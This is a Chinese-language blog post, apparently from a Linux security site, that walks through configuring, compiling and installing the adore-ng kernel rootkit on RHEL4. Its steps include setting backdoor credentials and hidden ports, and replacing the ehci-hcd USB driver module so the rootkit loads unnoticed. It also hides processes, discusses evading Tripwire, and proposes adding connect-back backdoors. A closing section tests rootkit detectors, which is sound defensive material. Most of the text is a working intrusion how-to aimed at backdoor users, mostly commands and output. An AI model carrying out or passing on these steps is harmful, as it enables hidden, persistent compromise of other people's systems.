前言: kernel 2.6已经大步走入linux的世界,写后门的和用后门的也得跟上潮流。简写约定: fc:Fedora core rh:Red Hat rhel4:red hat enterprise linux 4 sk:suckit adore:adore-ng rk:rootkit lkm:loadable kernel modules什么是adore-ng? 一个LKM rk,google adore会有很多详细的介绍。为什么选择他? 1、我没弄到sk for 2.6的 2、fc2之后rh的内核默认就禁用了kmem了,sk无法inject the kernel on the fly,同时很多检查rk的程序也失效:) 3、adore是大牛Stealth写的,历史悠久,帮他测试的人N多,应该会比其他LKM稳定,LKM的稳定会严重的影响系统的稳定,所以选型我们必须要谨慎,就算功能再牛,玩一下就把系统挂了,还被别人发现了,那就得不尝失了。看看功能: [root@RHEL4 adore-ng]# cat FEATURESIf you never used adore before, here’s a list of supported things:o runs on kernel 2.4.x UP and SMP systems o runs on kernel 2.6.x UP and SMP systems, i386 and x86_64 archs tested o file and directory hiding o process hiding o socket-hiding (no matter whether LISTENing, CONNECTED etc) o full-capability back door o does not utilize sys_call_table but VFS layer o KISS principle, to have as less things in there as possible but also being as much powerful as possible o hides itself from /proc and /sys filesystemso syslog filtering: logs generated by hidden processes never appear on the syslog UNIX socket anymore o wtmp/utmp/lastlog filtering: writing of xtmp entries by hidden processes do not appear in the file, except you force it by using special hidden AND authenticated process (a sshd back door is usually only hidden thus xtmp entries written by sshd don’t make it to disk) o (optional) relinking of LKMs as described in phrack #61 aka LKM infection to make it possible to be automatically reloaded after reboots (2.4 and 2.6) 本文环境: 真实机器非虚拟机 [root@RHEL4 adore-ng]# uname -a; cat /etc/RedHat-release linux RHEL4 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2005 i686 athlon i386 GNU/linux Red Hat Enterprise linux AS release 4 (Nahant)下载: google adore-ng 或者可以在素包子的网站 http://baoz.net找找。编辑和编译: [root@RHEL4 adore-ng]# mv Makefile.2.6 Makefile然后编辑下面的内容 EXTRA_CFLAGS=-DELITE_UID=2618748389U -DELITE_GID=4063569279U EXTRA_CFLAGS+=-DCURRENT_ADORE=54 EXTRA_CFLAGS+=-DADORE_KEY=”fgjgggfd”这个是隐藏的TCP端口,最后的0不要动。 u_short HIDDEN_SERVICES[] = {2222, 7350, 0}; 如果你是SMP的机器,就把下面打开。 EXTRA_CFLAGS+=-D__SMP__设置你内核代码的位置 KERNEL_SOURCE=/usr/src/linuxOK,保存退出,make[root@RHEL4 adore-ng]# make cc -DELITE_UID=2648745389U -DELITE_GID=6063589279U -DCURRENT_ADORE=54 -DADORE_KEY=”djksdfnvn” -DHIDE ava.c libinvisible.c -o ava ava.c:47: warning: integer constant is too large for “unsigned long” type ava.c:47: warning: large integer implicitly truncated to unsigned type libinvisible.c: In function `adore_hidefile’: libinvisible.c:76: warning: integer constant is too large for “unsigned long” type libinvisible.c:76: warning: large integer implicitly truncated to unsigned type make -C /usr/src/linux SUBDIRS=`pwd` modules make[1]: Entering directory `/usr/src/kernels/2.6.9-5.EL-i686′ CC [M] /root/adore-ng/adore-ng-2.6.o /root/adore-ng/adore-ng-2.6.c:56: warning: `MODULE_PARM_’ is deprecated (declared at include/linux/module.h:552) /root/adore-ng/adore-ng-2.6.c:59: warning: `MODULE_PARM_’ is deprecated (declared at include/linux/module.h:552) /root/adore-ng/adore-ng-2.6.c:61: warning: `MODULE_PARM_’ is deprecated (declared at include/linux/module.h:552) /root/adore-ng/adore-ng-2.6.c: In function `adore_opt_filldir’: /root/adore-ng/adore-ng-2.6.c:281: warning: integer constant is too large for “unsigned long” type /root/adore-ng/adore-ng-2.6.c:281: warning: comparison is always false due to limited range of data type /root/adore-ng/adore-ng-2.6.c: In function `adore_root_filldir’: /root/adore-ng/adore-ng-2.6.c:363: warning: integer constant is too large for “unsigned long” type /root/adore-ng/adore-ng-2.6.c:363: warning: comparison is always false due to limited range of data type Building modules, stage 2. MODPOST CC /root/adore-ng/adore-ng-2.6.mod.o LD [M] /root/adore-ng/adore-ng-2.6.ko make[1]: Leaving directory `/usr/src/kernels/2.6.9-5.EL-i686′ cc -O2 symsed.c -o symsed说一下他的relink,就是把adore插到别的模块去的功能,我们看看他做了啥 system(“cp $lkm_path t.ko”); system(“./symsed t.ko zero;ld -r adore-ng-2.6.ko t.ko -o z.ko; rm -f t.ko”); print “nCopy trojaned LKM back to original LKM? (y/n)n”;while ($yn !~ /^(y|n)$/i) { $yn = <STDIN>; $yn =~ s/n//; }if ($yn =~ /y/i) { system(“cp z.ko $lkm_path”); } else { print “nOutput LKM is z.kon”; } 我在RHEL4下插入模块后模块都无法启动,不过没关系,我们不插入,我们替换:) 只有十分少数人是安装了系统后modprobe -r的,所以我们可以很容易的替换一些系统不十分需要的模块,我们看看我的模块 [root@RHEL4 adore-ng]# lsmod Module Size Used by dm_mod 54741 0 ohci_hcd 21713 0 snd_intel8×0 33769 0 snd_ac97_codec 63889 1 snd_intel8×0 snd_pcm_oss 49017 0 snd_mixer_oss 17985 1 snd_pcm_oss snd_pcm 96841 2 snd_intel8×0,snd_pcm_oss snd_timer 29893 1 snd_pcm snd_page_alloc 9673 2 snd_intel8×0,snd_pcm snd_mpu401_uart 8769 1 snd_intel8×0 snd_rawmidi 26597 1 snd_mpu401_uart snd_seq_device 8137 1 snd_rawmidi snd 54949 9snd_intel8×0,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device soundcore 9889 1 snd sis900 18756 0 ext3 116809 1 jbd 71257 1 ext3我们选一个 Used By是0而且不怎么用的模块,比如usb的驱动,呵呵 ehci_hcd刚才已经被我用了,所以这里看不到,我们还可以用ohci_hcd或者是声卡的模块。看看他在哪 [root@RHEL4 adore-ng]# modprobe -l | grep ehci /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko卸了他 [root@RHEL4 adore-ng]# modprobe -r ehci-hcd 替换他 [root@RHEL4 adore-ng]# cp adore-ng-2.6.ko /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko 加载他 [root@RHEL4 adore-ng]# modprobe ehci-hcd 检查他 [root@RHEL4 adore-ng]# ./ava I Checking for adore 0.12 or higher … Adore 1.54 installed. Good luck.ELITE_UID: 2648745389, ELITE_GID=1768621983, ADORE_KEY=djksdfnvn CURRENT_ADORE=54纰漏: 如果对方使用了tripwire(RHEL4默认安装了),那么对ehci-hcd.ko的替换就很容易暴露,不过也没办法,就算relink模块一样是会暴露的,呵呵疑问: 1、Hidden ports (adore-ng.h) go decimal, i.e. ‘2222′ hides everything which belongs to port 2222. 这句话我理解是,同时隐藏和2222端口有关系的进程,呵呵,可能我对他的everything理解错了吧 :) [root@RHEL4 ~]# nc -vvnlp 2222 listening on [any] 2222 …[root@RHEL4 adore-ng]# ps aux | grep 2222 root 1938 0.0 0.1 1724 496 pts/1 S+ 13:34 0:00 nc -vvnlp 2222 root 1941 0.0 0.1 5304 684 pts/0 S+ 13:36 0:00 grep 2222 2、[root@RHEL4 adore-ng]# grep full-capability FEATURES o full-capability back door 这个有点忽悠人,这个backdoor分明就是一个localroot,我个人觉得localroot不叫backdoor [root@RHEL4 adore-ng]# ./ava | grep root r execute as root 估计就是这个。改进: 1、根据进程名隐藏特定进程,这样我们就灵活很多了,有了这个功能,我们可以弥补adore在后门方面的缺陷,结合一些bindport或者connect back的后门使用,否则系统进都进不去了,隐藏不隐藏对我们来说没意义了啊,现在只根据pid隐藏,一旦reboot了之后,pid肯定变了。。。 2、加一个端口复用或回连的后门功能吧。。。。类似sk那样的。检测: 1、官方给出的检查工具http://stealth.openwall.net/rootkits/removal/determine-0-24.tgz[root@RHEL4 determine]# ./determine deter-mine LKM rootkit detector. (C) 2004 StealthTrying to detect hidden processes …Done. Scanning /dev/mem for signatures. This may take a while … Did not find any sign of a LKM rootkit. 我们隐藏一个进程看看 [root@RHEL4 determine]# ava i 1557 Checking for adore 0.12 or higher … Adore 1.54 installed. Good luck. Made PID 1557 invisible.再检查 [root@RHEL4 determine]# ./determine deter-mine LKM rootkit detector. (C) 2004 Stealth Trying to detect hidden processes … Process with PID 1557 does not have a appropriate /proc entry. Hidden?Done. Scanning /dev/mem for signatures. This may take a while … Unusual behaivior has been detected. Please consult the removal chapter of the README-file. <–发现了2、chkrootkit chkrootkit-0.46a这个可以发现隐藏了一个进程3、rkhunter rkhunter-1.2.8这个东西连隐藏进程都不去检查,还叫什么hunter….不过他在其他方面到是做的挺细心的。FreeBSD pseudofs空指针引用本地权限提升漏洞开源防火墙闯江湖 四大名捕看家护院相关资讯 Linux安全
易网时代-编程资源站